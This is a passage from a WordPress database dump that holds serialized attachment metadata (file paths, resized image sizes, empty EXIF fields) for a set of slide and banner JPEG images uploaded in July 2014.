ype\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:22:\"slide81-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:21:\"slide81-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:21:\"slide81-1-880x486.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:21:\"slide81-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:21:\"slide81-1-450x248.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:248;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:21:\"slide81-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1095,1963,'_wp_attached_file','2014/07/slide91-1.jpg'),(1096,1963,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1060;s:4:\"file\";s:21:\"2014/07/slide91-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"slide91-1-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"slide91-1-1024x565.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"slide91-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"slide91-1-768x424.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:424;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"slide91-1-1536x848.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:848;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"slide91-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:22:\"slide91-1-1670x922.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:922;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:22:\"slide91-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:21:\"slide91-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:21:\"slide91-1-880x486.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:21:\"slide91-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:21:\"slide91-1-450x248.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:248;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:21:\"slide91-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1097,1964,'_wp_attached_file','2014/07/slide101-1.jpg'),(1098,1964,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1060;s:4:\"file\";s:22:\"2014/07/slide101-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"slide101-1-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"slide101-1-1024x565.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"slide101-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"slide101-1-768x424.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:424;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:23:\"slide101-1-1536x848.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:848;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"slide101-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:23:\"slide101-1-1670x922.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:922;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:23:\"slide101-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:22:\"slide101-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:22:\"slide101-1-880x486.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:22:\"slide101-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:22:\"slide101-1-450x248.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:248;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:22:\"slide101-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1099,1965,'_wp_attached_file','2014/07/slide111-1.jpg'),(1100,1965,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1060;s:4:\"file\";s:22:\"2014/07/slide111-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"slide111-1-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"slide111-1-1024x565.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"slide111-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"slide111-1-768x424.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:424;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:23:\"slide111-1-1536x848.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:848;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"slide111-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:23:\"slide111-1-1670x922.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:922;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:23:\"slide111-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:22:\"slide111-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:22:\"slide111-1-880x486.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:22:\"slide111-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:22:\"slide111-1-450x248.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:248;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:22:\"slide111-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1101,1966,'_wp_attached_file','2014/07/slide121-1.jpg'),(1102,1966,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1171;s:4:\"file\";s:22:\"2014/07/slide121-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"slide121-1-300x183.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"slide121-1-1024x625.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:625;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"slide121-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"slide121-1-768x468.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:468;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:23:\"slide121-1-1536x937.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:937;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"slide121-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:24:\"slide121-1-1670x1019.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:1019;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:23:\"slide121-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:22:\"slide121-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:22:\"slide121-1-880x537.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:537;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:22:\"slide121-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:22:\"slide121-1-450x274.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:22:\"slide121-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1103,1967,'_wp_attached_file','2014/07/0111-1.jpg'),(1104,1967,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:500;s:4:\"file\";s:18:\"2014/07/0111-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"0111-1-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"0111-1-1024x438.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:438;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"0111-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"0111-1-768x328.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"0111-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:18:\"0111-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:18:\"0111-1-880x376.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:376;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:18:\"0111-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:18:\"0111-1-450x192.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:18:\"0111-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1105,1968,'_wp_attached_file','2014/07/0211-1.jpg'),(1106,1968,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:500;s:4:\"file\";s:18:\"2014/07/0211-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"0211-1-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"0211-1-1024x438.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:438;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"0211-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"0211-1-768x328.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"0211-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:18:\"0211-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:18:\"0211-1-880x376.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:376;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:18:\"0211-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:18:\"0211-1-450x192.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:18:\"0211-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1107,1969,'_wp_attached_file','2014/07/0311-1.jpg'),(1108,1969,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:500;s:4:\"file\";s:18:\"2014/07/0311-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"0311-1-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"0311-1-1024x438.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:438;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"0311-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"0311-1-768x328.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"0311-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:18:\"0311-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:18:\"0311-1-880x376.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:376;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:18:\"0311-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:18:\"0311-1-450x192.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:18:\"0311-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1109,1970,'_wp_attached_file','2014/07/0411-1.jpg'),(1110,1970,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:500;s:4:\"file\";s:18:\"2014/07/0411-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"0411-1-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"0411-1-1024x438.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:438;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"0411-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"0411-1-768x328.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"0411-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:18:\"0411-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:18:\"0411-1-880x376.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:376;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:18:\"0411-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:18:\"0411-1-450x192.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:18:\"0411-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1111,1971,'_wp_attached_file','2014/07/b-slide11-1.jpg'),(1112,1971,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1048;s:4:\"file\";s:23:\"2014/07/b-slide11-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"b-slide11-1-300x164.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"b-slide11-1-1024x559.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:559;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"b-slide11-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"b-slide11-1-768x419.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:419;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:24:\"b-slide11-1-1536x838.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:838;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"b-slide11-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:24:\"b-slide11-1-1670x912.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:912;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:24:\"b-slide11-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:23:\"b-slide11-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:23:\"b-slide11-1-880x480.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:23:\"b-slide11-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:23:\"b-slide11-1-450x246.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:246;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:23:\"b-slide11-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keyw